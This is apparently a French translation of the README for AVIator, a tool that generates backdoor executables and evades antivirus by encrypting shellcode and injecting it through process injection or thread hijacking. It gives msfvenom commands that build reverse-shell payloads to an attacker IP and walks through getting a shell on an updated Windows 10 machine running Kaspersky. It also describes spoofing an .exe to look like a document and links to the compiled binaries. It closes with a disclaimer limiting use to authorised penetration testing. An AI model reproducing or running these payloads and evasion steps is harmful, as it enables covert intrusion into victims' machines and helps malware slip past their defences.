
Projet d'évasion antivirus
AviAtor porté sur NETCore 5 avec une interface utilisateur mise à jour
À propos://nom
AV : AntiVirus
Ator : est un épéiste, alchimiste, scientifique, magicien, érudit et ingénieur, capable parfois de produire des objets à partir de rien (https://en.wikipedia.org/wiki/Ator)
À propos://objectif
AV|Ator est un utilitaire de génération de backdoor, qui utilise des techniques cryptographiques et d’injection afin de contourner la détection AV. Plus précisément :
[https://attack.mitre.org/techniques/T1055/] :
Injection de portable exécutable qui consiste à écrire du code malveillant directement dans le processus (sans fichier sur disque) puis à invoquer l’exécution avec du code supplémentaire ou en créant un thread distant. Le déplacement du code injecté introduit l’exigence supplémentaire de remapper les références mémoire. Des variantes de cette méthode telles que l’injection de DLL réflexive (écriture d’une DLL auto-mappée dans un processus) et le module mémoire (mapper la DLL lors de l’écriture dans le processus) résolvent le problème de relocalisation d’adresse.
Détournement d’exécution de thread qui consiste à injecter du code malveillant ou le chemin d’une DLL dans un thread d’un processus. Similaire au Process Hollowing, le thread doit d’abord être suspendu.
L’application possède un formulaire composé de trois entrées principales (voir capture d’écran ci-dessous) :

Remarque importante : le shellcode doit être fourni sous forme de tableau d’octets C#.
Les valeurs par défaut contiennent un shellcode qui exécute notepad.exe (32 bits). Cette démo est fournie comme indication de la façon dont le code doit être formaté (avec msfvenom, cela peut être facilement fait avec l’option -f csharp, par ex. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
Après avoir rempli les entrées fournies et sélectionné le chemin de sortie, un exécutable est généré selon les options choisies.
En termes simples, usurper un fichier exécutable pour qu’il semble avoir une extension « innocente » comme 'pdf', 'txt', etc. Par ex. le fichier "testcod.exe" sera interprété comme "tesexe.doc"
Attention au fait que certains AV signalent l’usurpation comme un malware en soi.
Je suppose que vous savez tous ce que c’est :)
Obtenir un shell sur une machine Windows 10 exécutant Kaspersky AV entièrement mise à jour
Créer la charge utile avec msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Utiliser AVIator avec les paramètres suivants
Architecture OS cible : x64
Technique d’injection : Thread Hijacking (Architecture du shellcode : x64, Architecture OS : x64)
Processus cible : explorer (laisser la valeur par défaut)
Configurer l’écouteur sur la machine attaquante
Exécuter le fichier exe généré sur la machine victime
Windows :
Soit compiler le projet, soit télécharger l’exécutable déjà compilé depuis le dossier suivant :
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux :
Installer Mono selon votre distribution Linux, télécharger et exécuter les binaires
Par ex. dans Kali :
root@kali# apt install mono-devel
root@kali# mono aviator.exe
À Damon Mohammadbagher pour la procédure de chiffrement
J’ai développé cette application afin de relever les défis exigeants du processus de test d’intrusion et c’est la SEULE MANIÈRE dont cette application devrait être utilisée. Assurez-vous d’avoir l’autorisation requise pour l’utiliser contre un système et ne l’utilisez jamais à des fins illégales.